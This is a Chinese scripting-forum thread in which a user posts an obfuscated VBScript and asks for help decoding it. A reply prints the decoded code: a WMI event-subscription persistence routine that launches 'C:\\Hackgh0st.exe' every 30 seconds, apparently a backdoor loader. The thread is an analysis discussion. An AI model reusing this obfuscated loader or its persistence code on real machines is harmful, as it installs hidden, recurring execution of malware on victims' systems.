[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖
zinet

Rank: 4

帖子
44 
积分
375 
技术
0  
捐助
0  
注册时间
2008-7-3 
1 跳转到 » 正序看帖
打印
tT
发表于 2011-8-4 10:10 | 只看该作者

[问题求助] 帮手解密一个vbs代码

代码如下:
ssss="qdzddeadzrdwzdzvrccrrrdzdrrrrdxrrurrudaxdzvrccrdarcrrrcrrzrcwduwdevrcrrdxrdvrcwrdxdxardurrwrdxrdarcwdvedvrdzvrccrdarcrrrcrrzrcwduwdzdrrrrdxrrurrudvrdvxdcddredzddeadzrdwzdzvrccrrrdzdrcxrccdearrercudaxdzvrccrrrdzdrrrrdxrrurruduwdearrercurrcrcrrrxrrerrardxrrercwdvedvrdxercrrrxrdardxrccrccdvrdvxdwzdcddrerccrcxrccrderrcrcrdwzdaxdwzdzvrccrrrdzdrcxrccdearrercuduwdxdrcwrdxrradvedvrdzddzadzddzrdeadxvdxzdxadxadzrdvrdvxdwzdcddrerccrcxrccrderrcrcrduedwzdaxdwzrrarrcrdedverccrcxrccrderrcrcrdurduadurduxdvxdcddrerrerccrrurrcrrerrvdaxdvrrcarrcrrerrarrdrrarcwrccdaudzzdzzduwdzzrcrrrxrrxrcwdzzrccrcvrdurccrdarcrrrcrrzrcwrrcrrxrredaudvrdcddrerderrxrrxrcrrrerdvrrardxdaxdvrrrarccrrxrdxrdarrwdvrdcddrercrrcvrrerrcrrercwrdxrcrrcurdvrrudwzdaxdwzduxduuduuduuduudcddrerccrcwrcercwdaxdvrdzdrdxrcwdwzrrxrdurrwdzdrrrrdxrrurrudwzdaxdwzdevrcrrdxrdvrcwrdxdxardurrwrdxrdarcwdvedvrdvrdzvrccrdarcrrrcrrzrcwduwdzdrrrrdxrrurrudvrdvrdvxdaurrxrdurrwdzdrrrrdxrrurruduwdxzrcvrredwzdvrdvrdevdaudzzdzzdezrdvrdarrvrrdrrrduurccrcwduwrdxrcerdxdvrdvrdvrdcddredzddeadzrdwzrdvrccrdxrdadaxrrdrdxrcwrrxrdurrwrdxrdarcwdverrerccrrurrcrrerrvdvudvrdecrdarcwrrcrcurdxdzdrdarcrrrcrrzrcwdearcurdxrrercwdevrrxrrerccrcvrrardxrcrdvrdvxduwrccrrzrdvrcarrerrcrrerccrcwrdvrrerdardxrdcdcddrerdvrccrdxrdaduwrrerdvrrardxdaxrdarrxrrerccrcvrrardxrcrrdcrderrxrrudcddrerdvrccrdxrdaduwrccrdarcrrrcrrzrcwrrcrrerrdrdxrrerrdrrcrrerdxdaxdvrrcurdurccrdarcrrrcrrzrcwdvrdcddrerdvrccrdxrdaduwrccrdarcrrrcrrzrcwrcwrdxrcercwdaxrccrcwrcercwdcddredzddeadzrdwzrdvrccrdxrdarrzrdvrcwrrrdaxrdvrccrdxrdaduwrrzrcvrcwrdcdcddredzddeadzrdwzrrcrcwrrcrrardxrcrdaxrrdrdxrcwrrxrdurrwrdxrdarcwdverrerccrrurrcrrerrvdvudvrrdcrdcdxdrrercwrdxrcrrcurdvrrudzrrrcrrardxrcrdxdrrerccrcwrcrrcvrdarcwrrcrrxrredvrdvxduwrccrrzrdvrcarrerrcrrerccrcwrdvrrerdardxrdcdcddrerrcrcwrrcrrardxrcrduwrcwrrcrrardxrcrrrcrdedaxrderrxrrxrcrrrerdvrrardxdvudvrrdcrrcrcwrrcrrardxrcrdvrdcddrerrcrcwrrcrrardxrcrduwrrcrrercwrdxrcrrcurdvrrurdurdxrcwrcardxrdxrrerdxrcurdxrrercwrccdaxrcrrcvrrerrcrrercwrdxrcrrcurdvrrudcddrerrcrcwrrcrrardxrcrduwrccrrvrrcrrzrrcrdzrrzrdvrccrccrdxrdedaxrdzrdvrrurccrdxdcddrerrcrcwrrcrrardxrcrduwrrzrcvrcwrdcdcddredzddeadzrdwzrdxrcurcwrdzrrurcwdaxrrdrdxrcwrrxrdurrwrdxrdarcwdverrerccrrurrcrrerrvdvudvrrdcrdcdearcurdxrrercwdeerrcrrurcwrdxrcrdvrdvxduwrccrrzrdvrcarrerrcrrerccrcwrdvrrerdardxrdcdcddrerdxrcurcwrdzrrurcwduwrrerdvrrardxdaxrdzrrcrrurcwrdxrcrrdcrrdrdzrrudcddrerdxrcurcwrdzrrurcwduwrcdrcvrdxrcrrcxdaxdvrrccrdxrrurdxrdarcwdwzdvzdwzrdzrcrrrxrradwzrdcrdcrcwrrcrrardxrcrrdxrcurdxrrercwdwzrcarrrrdxrcrrdxdwzrcwrrcrrardxrcrrrcrdedaxdvrdvrdvrdvurderrxrrxrcrrrerdvrrardxdvudvrrdcrrcrcwrrcrrardxrcrdvrdvrdvrdcddrerdxrcurcwrdzrrurcwduwrcdrcvrdxrcrrcxrrurdvrrerrdrcvrdvrrdrdxdaxdvrrcarcdrrudvrdcddredzddeadzrdwzrdzrrurcwrrzrdvrcwrrrdaxrdxrcurcwrdzrrurcwduwrrzrcvrcwrdcdcddredzddeadzrdwzrdzrdardurrerdedaxrrdrdxrcwrrxrdurrwrdxrdarcwdverrerccrrurrcrrerrvdvudvrrdcrdcdeerrcrrurcwrdxrcrdzrrrxdevrrxrrerccrcvrrardxrcrdewrrcrrerderrcrrerrddvrdvxduwrccrrzrdvrcarrerrcrrerccrcwrdvrrerdardxrdcdcddrerdzrdardurrerdeduwrdarrxrrerccrcvrrardxrcrdaxrdvrccrdxrdarrzrdvrcwrrrduwrrzrdvrcwrrrdcddrerdzrdardurrerdeduwrdzrrcrrurcwrdxrcrdaxrdzrrurcwrrzrdvrcwrrrduwrrzrdvrcwrrrdcddrerdzrdardurrerdeduwrrzrcvrcwrdcdcddrerrcrrercwdwzdavdueduedavdueduadcddre"
execute chr(114)&chr(100)&chr(120)&chr(61)&chr(109)&chr(105)&chr(100)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(44)&chr(49)&chr(44)&chr(49)&chr(41)&chr(13)&chr(10)&chr(114)&chr(100)&chr(61)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(100)&chr(120)&chr(44)&chr(34)&chr(100)&chr(34)&chr(44)&chr(34)&chr(48)&chr(34)&chr(41)&chr(44)&chr(34)&chr(97)&chr(34)&chr(44)&chr(34)&chr(49)&chr(34)&chr(41)&chr(44)&chr(34)&chr(99)&chr(34)&chr(44)&chr(34)&chr(50)&chr(34)&chr(41)&chr(44)&chr(34)&chr(98)&chr(34)&chr(44)&chr(34)&chr(51)&chr(34)&chr(41)&chr(44)&chr(34)&chr(119)&chr(34)&chr(44)&chr(34)&chr(52)&chr(34)&chr(41)&chr(44)&chr(34)&chr(122)&chr(34)&chr(44)&chr(34)&chr(53)&chr(34)&chr(41)&chr(44)&chr(34)&chr(104)&chr(34)&chr(44)&chr(34)&chr(54)&chr(34)&chr(41)&chr(44)&chr(34)&chr(113)&chr(34)&chr(44)&chr(34)&chr(55)&chr(34)&chr(41)&chr(44)&chr(34)&chr(114)&chr(34)&chr(44)&chr(34)&chr(56)&chr(34)&chr(41)&chr(44)&chr(34)&chr(116)&chr(34)&chr(44)&chr(34)&chr(57)&chr(34)&chr(41)&chr(13)&chr(10)&chr(115)&chr(115)&chr(115)&chr(115)&chr(61)&chr(109)&chr(105)&chr(100)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(44)&chr(50)&chr(41)&chr(13)&chr(10)&chr(115)&chr(115)&chr(115)&chr(115)&chr(61)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(44)&chr(34)&chr(100)&chr(34)&chr(44)&chr(34)&chr(48)&chr(34)&chr(41)&chr(44)&chr(34)&chr(114)&chr(34)&chr(44)&chr(34)&chr(49)&chr(34)&chr(41)&chr(44)&chr(34)&chr(99)&chr(34)&chr(44)&chr(34)&chr(50)&chr(34)&chr(41)&chr(44)&chr(34)&chr(119)&chr(34)&chr(44)&chr(34)&chr(51)&chr(34)&chr(41)&chr(44)&chr(34)&chr(118)&chr(34)&chr(44)&chr(34)&chr(52)&chr(34)&chr(41)&chr(44)&chr(34)&chr(117)&chr(34)&chr(44)&chr(34)&chr(53)&chr(34)&chr(41)&chr(44)&chr(34)&chr(97)&chr(34)&chr(44)&chr(34)&chr(54)&chr(34)&chr(41)&chr(44)&chr(34)&chr(101)&chr(34)&chr(44)&chr(34)&chr(55)&chr(34)&chr(41)&chr(44)&chr(34)&chr(120)&chr(34)&chr(44)&chr(34)&chr(56)&chr(34)&chr(41)&chr(44)&chr(34)&chr(122)&chr(34)&chr(44)&chr(34)&chr(57)&chr(34)&chr(41)&chr(13)&chr(10)&chr(102)&chr(111)&chr(114)&chr(32)&chr(105)&chr(61)&chr(49)&chr(32)&chr(116)&chr(111)&chr(32)&chr(108)&chr(101)&chr(110)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(41)&chr(32)&chr(115)&chr(116)&chr(101)&chr(112)&chr(32)&chr(51)&chr(13)&chr(10)&chr(104)&chr(61)&chr(109)&chr(105)&chr(100)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(44)&chr(105)&chr(44)&chr(51)&chr(41)&chr(13)&chr(10)&chr(100)&chr(111)&chr(13)&chr(10)&chr(105)&chr(102)&chr(32)&chr(108)&chr(101)&chr(102)&chr(116)&chr(40)&chr(104)&chr(44)&chr(49)&chr(41)&chr(61)&chr(34)&chr(48)&chr(34)&chr(32)&chr(116)&chr(104)&chr(101)&chr(110)&chr(13)&chr(10)&chr(104)&chr(61)&chr(114)&chr(105)&chr(103)&chr(104)&chr(116)&chr(40)&chr(104)&chr(44)&chr(108)&chr(101)&chr(110)&chr(40)&chr(104)&chr(41)&chr(45)&chr(49)&chr(41)&chr(13)&chr(10)&chr(101)&chr(108)&chr(115)&chr(101)&chr(13)&chr(10)&chr(101)&chr(120)&chr(105)&chr(116)&chr(32)&chr(100)&chr(111)&chr(13)&chr(10)&chr(101)&chr(110)&chr(100)&chr(32)&chr(105)&chr(102)&chr(13)&chr(10)&chr(108)&chr(111)&chr(111)&chr(112)&chr(13)&chr(10)&chr(104)&chr(61)&chr(104)&chr(45)&chr(114)&chr(100)&chr(13)&chr(10)&chr(117)&chr(115)&chr(115)&chr(61)&chr(117)&chr(115)&chr(115)&chr(38)&chr(99)&chr(104)&chr(114)&chr(40)&chr(104)&chr(41)&chr(13)&chr(10)&chr(110)&chr(101)&chr(120)&chr(116)&chr(13)&chr(10)&chr(101)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(117)&chr(115)&chr(115)



请帮忙一下
收藏 分享

broly

Rank: 7Rank: 7Rank: 7

帖子
881 
积分
2103 
技术
95  
捐助
55  
注册时间
2010-5-23 
3
发表于 2011-8-4 11:41 | 只看该作者
最终要执行的代码
  1. SET WshShell=Wscript.CreateObject("Wscript.Shell")

  2. SET WshSysEnv=WshShell.Environment("Process") 

  3. sysdir = WshSysEnv.Item("SYSTEMROOT") 

  4. sysdir2 = mid(sysdir,1,3)

  5. nslink="winmgmts:\\.\root\subscription:"

  6. doorname="msoecj"

  7. runinterval = 30000

  8. stxt="Set objShell = CreateObject(""Wscript.Shell""):objShell.Run ""C:\\Hackgh0st.exe"""

  9. SET asec=getobject(nslink&"ActiveScriptEventConsumer").spawninstance_

  10. asec.name=consumer_dol

  11. asec.scriptingengine="vbscript"

  12. asec.scripttext=stxt

  13. SET asecpath=asec.put_

  14. SET itimer=getobject(nslink&"__IntervalTimerInstruction").spawninstance_

  15. itimer.timerid=doorname&"_itimer"

  16. itimer.intervalbetweenevents=runinterval

  17. itimer.skipifpassed=false

  18. itimer.put_

  19. SET evtflt=getobject(nslink&"__EventFilter").spawninstance_

  20. evtflt.name=filter_gfl

  21. evtflt.query="select * from __timerevent where timerid="""&doorname&"_itimer"""

  22. evtflt.querylanguage="wql"

  23. SET fltpath=evtflt.put_

  24. SET fcbnd=getobject(nslink&"__FilterToConsumerBinding").spawninstance_

  25. fcbnd.consumer=asecpath.path

  26. fcbnd.filter=fltpath.path

  27. fcbnd.put_

  28. int 922921
复制代码
---学无止境---

TOP

Batcher

Rank: 12Rank: 12Rank: 12

帖子
14927 
积分
46133 
技术
857  
捐助
745  
注册时间
2008-6-9 
2
发表于 2011-8-4 11:03 | 只看该作者
批处理解密破解已经加密的VBS
http://bbs.bathome.net/thread-3637-1-1.html
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

返回列表